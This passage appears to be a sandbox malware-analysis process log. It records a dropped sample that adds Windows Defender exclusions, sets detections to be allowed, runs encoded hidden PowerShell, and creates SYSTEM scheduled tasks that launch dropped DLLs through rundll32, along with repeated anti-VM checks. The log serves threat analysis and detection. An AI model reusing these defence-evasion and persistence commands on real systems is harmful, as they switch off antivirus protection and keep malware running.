  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5012
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "goKjbwSei" /SC once /ST 06:11:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3104
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "goKjbwSei"
  2⤵
  PID:6056
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "goKjbwSei"
  2⤵
  PID:4708
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zjtCPqTOixnxYITTP" /SC once /ST 15:50:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\qEOazug.exe\" XQ /VgGndidCL 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2596
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "zjtCPqTOixnxYITTP"
  2⤵
  PID:2972
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 1340
  2⤵
  - Program crash
  PID:5904

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:232
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5584

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5640

C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\qEOazug.exe
C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\qEOazug.exe XQ /VgGndidCL 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:1180
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6088
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5700
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5908
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2244
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6016
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:6064
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5484
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:1536
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5480
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5280
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5424
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1988
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:3528
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bjeWJKrHnPpdAGCduF"
  2⤵
  PID:536
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:6044
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:6072
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:2568
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1204
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:3856
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RgdiTWAdU\YGXvol.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gwLAkOfFqvEnRPY" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:1816
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gwLAkOfFqvEnRPY2" /F /xml "C:\Program Files (x86)\RgdiTWAdU\oRPOzim.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2728
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gwLAkOfFqvEnRPY"
  2⤵
  PID:4580
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gwLAkOfFqvEnRPY"
  2⤵
  PID:3664
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "pkYJRvtpGfZaSU" /F /xml "C:\Program Files (x86)\dLLzADClkagU2\pDNKTqh.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6048
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yMFQLDLxyvLyt2" /F /xml "C:\ProgramData\KTrRWZTJHHaefVVB\fOuknsD.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "raxKGaIGjdREsorgF2" /F /xml "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\bbrFONm.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5432
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "JnvrxUwmUummIDFugIt2" /F /xml "C:\Program Files (x86)\wGxkUGMqSkfBC\hWdIJCd.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "mFeioppqsVnzBGRpZ" /SC once /ST 06:58:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\jPiZHHpL\pNBNohV.dll\",#1 /xdidOU 525403" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:3324
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "mFeioppqsVnzBGRpZ"
  2⤵
  PID:5320
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zjtCPqTOixnxYITTP"
  2⤵
  PID:3892
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 2196
  2⤵
  - Program crash
  PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1984 -ip 1984
1⤵
PID:2876

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\jPiZHHpL\pNBNohV.dll",#1 /xdidOU 525403
1⤵
PID:3504
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\jPiZHHpL\pNBNohV.dll",#1 /xdidOU 525403
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:2236
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "mFeioppqsVnzBGRpZ"
    3⤵
    PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5500 -ip 5500
1⤵
PID:1340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5440 -ip 5440
1⤵
PID:4288

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:1288

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2136

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3788

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5672

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4100

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3436

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5532

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5600

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6056

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3168

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:180

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3440

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5916

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1880

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1172

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5860

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
